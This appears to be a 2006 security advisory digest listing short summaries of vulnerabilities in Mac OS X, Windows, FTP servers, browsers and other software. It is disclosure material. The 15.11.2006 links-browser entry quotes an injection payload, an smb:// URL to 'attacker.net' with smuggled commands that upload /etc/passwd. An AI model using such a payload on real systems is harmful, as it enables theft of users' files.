30.11.2006 Detailed

7! Multiple MacOS X security vulnerabilities   Apple Type Services server font processing buffer overflow. ftpd may allow arbitrary users to determine account name validity. CFNetwork may allow arbitrary FTP commands to be executed via a crafted FTP URI. Security Framework Secure Transport may not negotiate the best cipher available. PPP driver fails to properly validate PADI packets (buffer overflow). Finder fails to properly handle malformed .DS_Store files. WebKit deallocated object access vulnerability.   Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

29.11.2006 Detailed

6! Borland idsql32.dll library buffer overflow   Buffer overflow in DbiQExec() function.   Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

28.11.2006 Detailed

9! ProFTPD buffer overflow updated since 10.11.2006   Off-by-one vulnerability in sreplace() is used for remote root access. 6! GNU RADIUS format string vulnerability   sqllog() format string vulnerability if SQL logging is enabled.   JBoss Web Server DeploymentFileRepository class directory traversal   setBaseDir() class function doesn't check base dir outside root application directory.

GnuPG buffer overflow   Buffer overflow on oversized file name.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

tar archiver directory traversal   Problem with outdated GNUTYPE_NAMES structure parsing allow to create symbolic links outside target directory.

Weak KDE Kate / Kwrite / Kile text processors file permissions updated since 19.07.2005   Backup files are created with weak permissions.

27.11.2006 Detailed

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.   QBIK Wingate DoS   Nedless loop on compressed DNS requests processing.   AT-TFTP / 3CTftpSvc TFTP servers buffer overflow   Buffer overflows in GET and PUT commands.

ps2text unfiltered shell characters code execution   Shell characters problem thorugh filename.

25.11.2006 Detailed

fvwm-menu-directory shell characters injection   Shell characters injection thorugh browed directories names is possible.   Apache mod_auth_kerberos DoS   Off-by-one overflow in der_get_oid.   Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

23.11.2006 Detailed

7! Microsoft Windows Media Player 10 buffer overflow   Stack overflow on ASX files parsing.   Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.   Firefox password manager form information leak   Password manager doesn't check form destination. It makes it possible for attacker to retrieve saved paramters, including saved login/password if he can insert form into content of the site.

22.11.2006 Detailed

6! XMPlay buffer overflow   Buffer overflow on .ASX and .M3U files parsing. 6! CA BrightStor ARCserve Backup buffer overflow   Buffer overflow on parsing TCP/6502 data.   PassGo SSO Plus weak permissions   Weak installation folder permissions.

VMWare VirtualClient cryptography protection bypass   SSL server certificate is not checked by client.

My Firewall Plus privilege escalation   explorer.exe is launched with local system privileges.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

20.11.2006 Detailed

7! Microsoft Windows Workstation service buffer overflow updated since 14.11.2006   Buffer overflow in RPC based service.   Dovecot IMAP/POP3 server off-by-one buffer overflow         Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

18.11.2006 Detailed

7! NetGear WG111 driver buffer overflow   Buffer overflow on beakon frame parsing. 6! libpng DoS updated since 16.11.2006   Out-of-bounds reading in png_set_sPLT().   Sun Java sandbox protection bypass   Swing library functions may access data from different applets.

Computer Associates CA Internet Security / CA Personal Firewall privilege escalation   Insufficient TDI and NDIS hooked function paramters validation.

TFTPD32 TFTP server buffer overflow   Buffer overflow on oversized filename.

HP-UX WBEM DoS

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

17.11.2006 Detailed

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

16.11.2006 Detailed

6! Multiple Panda Antivirus ActiveScan ActiveX security vulnerabilities   Memory corruption, information leak, client PC rebooting.   UniversalFTP FTP Server DoS   Server crash on MKD command with malformed argument.   Selenium FTP Server / Conxint FTP directory traversal   Directory traversal in different FTP commands.

MDaemon mail server weak permissions   Installation folder allows User group to create files, making it possible to spoof system DLLs with local ones.

Kerio Webstar privilege escalation   Suid application loads library from current directory.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

Microsoft Windows Client Service for Netware multiple vulnerabilities updated since 14.11.2006   Memory corruption, DoS.

Outpost Firewall privilege escalation updated since 02.11.2006   Insufficient incoming data validation for \Device\SandBox device driver and SSDT hoocked functions.

15.11.2006 Detailed

9! Microsoft Windows daxctle.ocx and HTML parsing buffer overflows updated since 13.09.2006   DirectAnimation.PathControl ActiveX control KeyFrame method heap overflow. Buffer overflow in CSS Floatproperty. May be used for hidden malware installation. 6! links browser shell characters vulnerability   Shell characters problem on external smbclient execution with URLs like 'smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '

14.11.2006 Detailed

9! Microsoft Windows XMLHTTP ActiveX code execution updated since 05.11.2006   ActiveX vulenrability is used for silent malware installation. 8! Macromedia Flash Player buffer overflow updated since 13.09.2006   Buffer overflow on .swf files playing. Vulnerability can be used for hidden malware installation through browser. 7! D-Link wireless drivers buffer overflow   Buffer overflow on oversized 802.11 beacon frame Rates parameter.

6! Multiple PowerDNS vulnerabilities   Buffer overflow and DoS.

6! Citrix Metaframe multiple security vulnerabilities updated since 09.11.2006   DoS and buffer overflow in IMA service (TCP/2512, TCP/2513).

3Com SuperStack 3 switch SNMP information leak   It's possible to get SNMP community string with management packets.

Novell BorderManager ISAKMP weak cryptography   Predictable cookie generation allows DoS and replay attacks.

GraphicsMagick buffer overflow   Buffer overflows on parsing PALM and DCM formats.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

VMWare ESX Server multiple security vulnerabilities   Invalid AMD fxsave/restore instructions handling. Vulnerabilities in embedded packages.

Digipass Go3 tokens weak encryption   Weakened implementation of 3DES is used.

13.11.2006 Detailed

7! Broadcom wireless drivers buffer overflow   Buffer overflow on oversized SSID. 6! AVG Antivirus multiple security vulnerabilities   Heap overflow on CAB and RAR archives parsing, integer overflow on EXE parsing.   Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

11.11.2006 Detailed

Mac OS X fpathconf() DoS   fpathconf() call for unsupported file type causes system panic.   Avahi privilege escalation   Insufficient Netlink parameters validation allow to manipulate server parameters.   OpenLDAP DoS   Certain combination of of LDAP bind request cause service crash.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

10.11.2006 Detailed

6! HP OpenView Client Configuration Manager code execution updated since 09.11.2006   It's possible to make data to be downloaded and executed thorugh TCP/3465.   MailMarshal directory traversal   Directory traversal on ARJ archives parsing.   Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

Netkit FTP Server protection bypass   Invalid chroot() and seteuid() usage under some circumstances allow FTP root directory bypass.

HP Tru64 Unix libpthread buffer overflow   Buffer overflow on parsing PTHREAD_CONFIG environment variable.

09.11.2006 Detailed

6! Multiple Cisco Secure Desktop security vulnerabilities   Weak NTFS permissions on installation folder. Protection bypass. Information leak.   GNU gv buffer overflow   Stack buffer overflow (overrun) on oversized PostScript comments.   Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

libarchive library DoS   End of archive during region skipping causes infinite loop.

08.11.2006 Detailed

8! Multiple Mozilla Firefox / Thunderbird / Seamonkey security vulnerabilities   Memory corruption, javascript code spoofing, code execution. May be used for hidden malware installation. 6! Linux kernel IPv6 filtering bypass   It's possible to bypass filtering by using fragmented packets. 6! Lotus Notes information leak   It's possible to check user existance and download certificate of new user with TCP/1352 port protocol.

6! Apple MacOS X Xcode OpenBase SQL privilege escalation updated since 16.10.2006   On executing tar from suid root application TAR_OPTIONS environment variable is not unset, making it possible to execute any application with root privileges. External application are executed with relative path. Dynamic libraries are loaded with relative path. Symbolic links problem.

OmniNFS NFS server buffer overflow

Lotus Domino tunekrnl utility buffer overflow   Multiple buffer overflows in suid utility.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

07.11.2006 Detailed

6! WarFTPd FTP Server format string vulnerability   CWD command format string vulnerability. 6! WFTPD Pro FTP server buffer overflow   Buffer overflow in APPE command.   Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

06.11.2006 Detailed

10! ICQ code execution   Unsafe function of ICQPhone.SipxPhoneManager ActiveX control allows to download and execute malware code from ICQ message or Web page. 6! Windows kernel GDI structures privilege escalation   It's possible to remap read-only share memory section in write mode.   Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

05.11.2006 Detailed

7! OpenSSL cryptography security vulnerabilities updated since 05.09.2006   It's possible to spoof signature of PKCS #1 v1.5 RSA key with exponent 3. 6! Imlib library multiple security vulnerabilities   Multiple vulnerabilities on parsing ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF formats. 6! Novell NetMail buffer overflow   Buffer overflow on parsing usernames with '.'.

XM Easy Personal FTP Server DoS   Buffer overflow on oversized NLST -al FTP command argument.

Essentia Web Server buffer overflow   Buffer overflow on oversized GET request.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

thttpd symbolic links problem   Insecure temporary file creation on logfiles rotation.

03.11.2006 Detailed

8! PHP functions buffer overflow   Buffer overflow in htmlentities() and htmlspecialchars() on UTF-8 encoding.   Linux kernel squashfs module double free()         Multiple HP System Management Homepage security vulnerabilities   Protection bypass, crossite scripting.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

iodine client buffer overflow   Buffer overflow on DNS server response parsing.

ingo1 mail processor shell characters problem   Insufficient shell characters filtering during procmail rules creation allows code execution.

pam_ldap protection bypass   It's possible to login into a suspended system account.

Nvidia for Linux / Solaris graphic drivers buffer overflow updated since 19.10.2006   Integer overflow in _nv000053X function leads to buffer overflow.

02.11.2006 Detailed

7! Mac OS X Apple Airport wireless driver memory corruption   Memory corruption on probe response frame parsing. 6! SAP Web Application Server multiple security vulnerabilities   Directory traversal, DoS, local privilege escalation thorugh named pipe.   HP-UX privilege escalation

Linux kernel DoS   /proc/net/ip6_flowlabel endless loop.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

Multiple wireshark sniffer DoS conditions   DoS conditions on parsing different protocols.

Cisco Security Agent Management Center authentication bypass   Acces with empty password is possible if NTLM authentication is configured.

01.11.2006 Detailed

Multiple Asterisk security vulnerabilities   Different malcrafted packets sequences cause service to crash.   Novell eDirectory DoS   Service crash on malformed login request.   Novell iManager DoS   Oversized TREE parameter of HTTP POST request causes NULL pointer dereference.

B-FOCuS Wireless routers unauthorized access   It's possible to access router's internal information with URL like http://target/html/defs/.

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)   PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.

BlooMooWeb ActiveX unauthorized access   Control has unsafe functions.

Hawking Technology WR254-CA wireless routers hardcoded DNS server address   139.175.55.244 DNS address is hardcoded.